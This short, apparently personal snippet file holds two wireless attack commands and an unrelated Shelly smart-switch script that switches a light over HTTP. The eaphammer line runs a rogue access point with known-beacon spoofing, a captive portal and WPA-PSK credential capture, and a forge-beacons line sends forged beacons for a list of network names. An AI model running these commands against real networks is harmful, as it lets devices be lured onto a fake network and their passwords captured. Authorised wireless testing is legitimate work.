./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});